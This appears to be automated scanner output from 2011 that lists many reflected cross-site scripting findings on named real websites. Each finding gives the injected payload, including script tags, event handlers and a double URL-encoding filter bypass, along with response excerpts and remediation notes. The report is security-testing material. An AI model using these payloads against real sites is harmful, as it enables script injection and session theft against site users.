The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3233e'style%3d'x%3aexpression(alert(1))'945f7f3be7c was submitted in the REST URL parameter 1. This input was echoed as 3233e'style='x:expression(alert(1))'945f7f3be7c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec574"><script>alert(1)</script>bb8cab8ea5b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Cont ...[SNIP]... <a href="http://www.pissedconsumer.com/favicon.icoec574"><script>alert(1)</script>bb8cab8ea5b#comments-section"> ...[SNIP]...
1.95. http://www.pissedconsumer.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.pissedconsumer.com
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e736"><script>alert(1)</script>e19151622c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8e52e'><script>alert(1)</script>470e1531952 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42e71'%3b29ab7550b80 was submitted in the REST URL parameter 1. This input was echoed as 42e71';29ab7550b80 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fca11%2522%253e%253ca%2520b%253dc%253ecba81895b5 was submitted in the REST URL parameter 1. This input was echoed as fca11"><a b=c>cba81895b5 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f6f7'-alert(1)-'96b9f092301 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<title> Page Not Found | The Responsibility Project by Liberty Mutual </title>
<!-- iconography -- ...[SNIP]... <![[CDATA
var thisPageURL = escape('http://www.responsibilityproject.com/1f6f7'-alert(1)-'96b9f092301'); var thisPageTitle = escape('Page Not Found'); var thisContentID = escape(''); var thisURI = escape('/1f6f7'-alert(1)-'96b9f092301'); var content_section_a = '';
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e712f"><script>alert(1)</script>ecf8024d0d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload db5c6<img%20src%3da%20onerror%3dalert(1)>dd7dbbc5fa4 was submitted in the REST URL parameter 1. This input was echoed as db5c6<img src=a onerror=alert(1)>dd7dbbc5fa4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6ddc7<script>alert(1)</script>ae658d7d145 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Thu, 31 Mar 2011 21:05:09 GMT Server: Apache/2.2.8 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html Content-Length: 291
<html><body><b>The page you requested:<br/><i>www.schoolfusion.us/favicon.ico6ddc7<script>alert(1)</script>ae658d7d145</i><br/> does not exist on www.schoolfusion.us<br />Please click <a href='http:// ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 30a56<a>43abf53a120 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
HTTP/1.0 400 Bad Request Set-Cookie: EUID=60673594-5bdb-11e0-864e-00000aac4907; expires=Wed, 26 Mar 2031 21:10:59 GMT; path=/; domain=.sciencedirect.com; HttpOnly; Set-Cookie: MIAMISESSION=60671ff0-5bdb-11e0-864e-00000aac4907:3479058659; path=/; domain=.sciencedirect.com; HttpOnly; Set-Cookie: MIAMIAUTH=...[SNIP]...; path=/; domain=.sciencedirect.com; HttpOnly; Content-Type: text/html Expires: Tue, 01 Jan 1980 04:00:00 GMT X-RE-Ref: 0 -1159484509 Server: www.sciencedirect.com 9999 138.12.6.73:80 P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "_http://www.w3.org/TR/html4/loose.dtd" > <html> <head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <!-- TRANS ...[SNIP]... <div class="errMsgText">Sorry, your request could not be processed because the qualifier of the URL (/favicon.ico30a56<a>43abf53a120) is incorrect. Please contact the Help Desk if the problem persists.</div> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b490'%3bdbd007d93b9 was submitted in the REST URL parameter 1. This input was echoed as 4b490';dbd007d93b9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 98ff2<img%20src%3da%20onerror%3dalert(1)>c9f80bac6da was submitted in the REST URL parameter 1. This input was echoed as 98ff2<img src=a onerror=alert(1)>c9f80bac6da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8945"><script>alert(1)</script>2ada341c7bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5d6d1<a>9b10da1fcf2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d8fdc<script>alert(1)</script>178b6295e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e86b0<script>alert(1)</script>b83e4ef8d96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The page /inc/404.php?url=/favicon.icoe86b0<script>alert(1)</script>b83e4ef8d96 not found on songarea.com. It might have been removed, had its name changed, is temporarily unavailable.<br> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6235"-alert(1)-"aff2b045367 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bacbe"><script>alert(1)</script>9092de6c01 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b33bc"><script>alert(1)</script>a51ed548431 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f08b"-alert(1)-"494e1710a8a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head> <ti ...[SNIP]... <script type="text/javascript"> // Note: it's important to keep these in separate script blocks COMSCORE.beacon({ c1: 2, c2: "6772046", c3: "", c4: "http://www.songmeanings.net/favicon.ico4f08b"-alert(1)-"494e1710a8a", // Replace this with the page URL that the site is on here, and also enter it into the <noscript> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec0c1"><script>alert(1)</script>afc2cefb029 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: Apache/2.0.63 (Unix) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Content-Type: text/html;charset=utf-8 Cache-Control: max-age=1751 Date: Thu, 31 Mar 2011 20:14:04 GMT Connection: close Connection: Transfer-Encoding Vary: User-Agent Content-Length: 34871
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea494"%3balert(1)//e6be00164d7 was submitted in the REST URL parameter 1. This input was echoed as ea494";alert(1)//e6be00164d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8148"><script>alert(1)</script>7ba47235182 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into an HTML comment. The payload 3c351--><script>alert(1)</script>439fc8ca87b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c58eb'-alert(1)-'f27d99f6952 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be7ae'%3b36893a9968e was submitted in the REST URL parameter 1. This input was echoed as be7ae';36893a9968e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ec02b'><a>9afb3f07edb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5687a'-alert(1)-'6b867f4e90c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c63b"><a>5bc279c610e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0337"><script>alert(1)</script>606da0c2b5e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3af88"><script>alert(1)</script>7ea5153237d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e074c"><script>alert(1)</script>fe4046e2407 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3bb6'%3be6d45b6e7b3 was submitted in the REST URL parameter 1. This input was echoed as f3bb6';e6d45b6e7b3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 326ac"><script>alert(1)</script>0947f8fff2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c5bb"><script>alert(1)</script>971346dceaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38e68</script><script>alert(1)</script>52c8d116fc7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a99a3'-alert(1)-'7297c590a85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82918'-alert(1)-'3627f2c27f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76d64"><script>alert(1)</script>f784c90cfda was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcdfe"><script>alert(1)</script>1e0455e6feb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 391bc<script>alert(1)</script>9cb7311b8a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 21:42:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 9465
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>File Not Found [UCLA ...[SNIP]... <strong>http://www.ucla.edu/favicon.ico391bc<script>alert(1)</script>9cb7311b8a3</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23567"%3balert(1)//7046d9ff590 was submitted in the REST URL parameter 1. This input was echoed as 23567";alert(1)//7046d9ff590 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload 58760</script><script>alert(1)</script>a4574d79d82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head>
<! ...[SNIP]... <SCRIPT type="text/javascript">
function go() { //alert("http://10.205.186.40/uscellular/common/USCC404ErrorPage.jsp?path=/58760</script><script>alert(1)</script>a4574d79d82"); var URL= "https://vcuscc.synovate.com/uscellularfeedback/?URL=" + escape("http://10.205.186.40/uscellular/common/USCC404ErrorPage.jsp?path=/58760</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d889'-alert(1)-'81287e459cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 839fc"><script>alert(1)</script>405c0c8ace0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 79bce<script>alert(1)</script>56b22d8aaa6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 21:48:01 GMT
Server: Apache
Status: 404
X-RouteInfo: webhost1
Content-Type: text/html; charset=UTF-8
Content-Length: 9637
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <p>The requested URL /favicon.ico79bce<script>alert(1)</script>56b22d8aaa6 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcef7"><script>alert(1)</script>b3410be2129 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c3e2e<img%20src%3da%20onerror%3dalert(1)>c6a0e9a058d was submitted in the REST URL parameter 1. This input was echoed as c3e2e<img src=a onerror=alert(1)>c6a0e9a058d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
<html> <head><title>URL Not Found</title></head> <body> <h1>URL Not Found</h1> <b>http://www.washington.edu/favicon.icoc3e2e<img src=a onerror=alert(1)>c6a0e9a058d</b> was not found or is no lon ...[SNIP]... <br> Reason: File does not exist: /www/world/favicon.icoc3e2e<img src=a onerror=alert(1)>c6a0e9a058d.</br> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee44c'%3b15cff5da24b was submitted in the REST URL parameter 1. This input was echoed as ee44c';15cff5da24b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ad5f"><a>0eafcc39315 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into an HTML comment. The payload 5d918--><script>alert(1)</script>64bc46b88f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac0e7<script>alert(1)</script>34ae1aa9b81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8dfe"><script>alert(1)</script>ca989a076a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bc06'-alert(1)-'692e4a8f43b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4a153<img%20src%3da%20onerror%3dalert(1)>ff635e63587 was submitted in the REST URL parameter 1. This input was echoed as 4a153<img src=a onerror=alert(1)>ff635e63587 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1be0</script><a>54a64c5c83c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 18a8f<img%20src%3da%20onerror%3dalert(1)>22617b15004 was submitted in the REST URL parameter 1. This input was echoed as 18a8f<img src=a onerror=alert(1)>22617b15004 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bb2c"><script>alert(1)</script>1c6fa125c77 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11a21"-alert(1)-"3be45c8108 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3edd0"style%3d"x%3aexpression(alert(1))"e9e7c857e46 was submitted in the REST URL parameter 1. This input was echoed as 3edd0"style="x:expression(alert(1))"e9e7c857e46 in the application's response.
